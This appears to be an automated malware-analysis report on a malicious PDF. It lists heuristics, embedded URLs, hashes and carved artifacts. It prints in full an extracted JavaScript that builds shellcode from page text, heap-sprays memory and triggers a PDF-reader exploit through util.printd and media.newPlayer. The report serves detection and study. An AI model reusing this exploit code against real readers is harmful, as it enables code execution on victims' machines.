Verdict: MALICIOUS
Risk Score: 150

Malware Insights
MITRE ATT&CK: T1059.001 PowerShell
The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The PDF_UNESCAPE heuristic suggests that the JavaScript is obfuscated, likely to hide its malicious intent. The presence of 'javascript_obj0055_001.js' as an extracted artifact further supports this. The primary function of the script appears to be downloading and executing a second-stage payload, which is a common technique for malware delivery.
Machine Learning
- Nyx PDF Classifier malicious score 0.9010
Heuristics (5)
- JavaScript action (low, 2 related findings), PDF_JAVASCRIPT: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster (critical), PDF_JS_EXPLOIT_CLUSTER: PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior. Matched line in script: `} var Wo = unescape(shell); var yR = unescape('%u3727%u27f5');`
- Embedded JS stream (low), PDF_JS: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Suspicious extracted artifact (info), EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info), EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.monotype.com (Monotype), referenced by PDF JavaScript
  - http://www.monotype.com/html/mtname/ms_timesnewroman.html, referenced by PDF JavaScript
  - http://www.monotype.com/html/mtname/ms_welcome.html, referenced by PDF JavaScript
  - http://www.monotype.com/html/type/license.html, referenced by PDF JavaScript
  - https://www.verisign.com/rpa, referenced by PDF JavaScript
  - http://ocsp.verisign.com/ocsp/status0, referenced by PDF JavaScript
  - https://www.verisign.com/rpa0, referenced by PDF JavaScript
  - http://crl.microsoft.com/pki/crl/products/CodeSignPCA.crl0, referenced by PDF JavaScript
  - http://www.microsoft.com/typography, referenced by PDF JavaScript
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0055_001.js | pdf-javascript-stream | PDF /JS object 55 at offset 0xAC2C7 | 1303 bytes |
| stream_000_off00000782.bin | decompressed-pdf-stream | PDF FlateDecoded stream at offset 0x782 | 409280 bytes |

Artifact: javascript_obj0055_001.js
SHA-256: 010992f011307af659e1ffd148e873c75aa77a54b28734c4720c8bf89a249e8e
Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 2 eval/decoder/string-building token(s).

Preview script (first 1,000 lines of the extracted script):

```javascript
function New_Script()
{
    var ckWord, numWords;
    var text = '';
    for (var i = 0; i < this.numPages; i++ )
    {
        numWords = this.getPageNumWords(i);
        for (var j = 0; j < numWords; j++)
        {
            ckWord = this.getPageNthWord(i, j);
            text = text + ckWord.toString();
        }
    }
    text = text + ' ';
    var k = 1;
    var b=0;
    var shell = '';
    var shell_1 = '';
    var shell_2 = '';
    var u_shell = '';
    var pos = 0;
    while (pos < (text.length-1)) {
        pos += k;
        if(!b)
        {
            b = 1;
            if (pos < text.length)
            { shell_1 = shell_1 + text[pos] + text[pos+1]; pos+=2; }
            else
            { shell_1 = shell_1 + text[pos]; pos+=1; }
        }
        else
        {
            b = 0;
            if (pos < text.length)
            { shell_2 = shell_2 + text[pos] + text[pos+1]; pos+=2; }
            else
            { shell_2 = shell_2 + text[pos]; pos+=1; }
            u_shell = '%u'+shell_2+shell_1;
            shell_1 = '';
            shell_2 = '';
            shell += u_shell;
        }
        k++;
        if (k>3) k = 1;
    }
    var Wo = unescape(shell);
    var yR = unescape('%u3727%u27f5');
    for(i=0;i<15;){yR+=yR;i ++;}
    yR=yR.substring(0,32768 - Wo.length);
    memory=new Array();
    for(i=0;i<0x2000;) {
        memory[i]= yR + Wo; i ++;
    }
    util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
    util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
    try {var obj = this.media;obj['new'+'Player'](null);} catch(e) {}
    util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
}
```

Artifact: stream_000_off00000782.bin
SHA-256: fcb479a00bdf7c05a68b91ba89a8ea3dd2be027dcca112f1f26270c081dc3502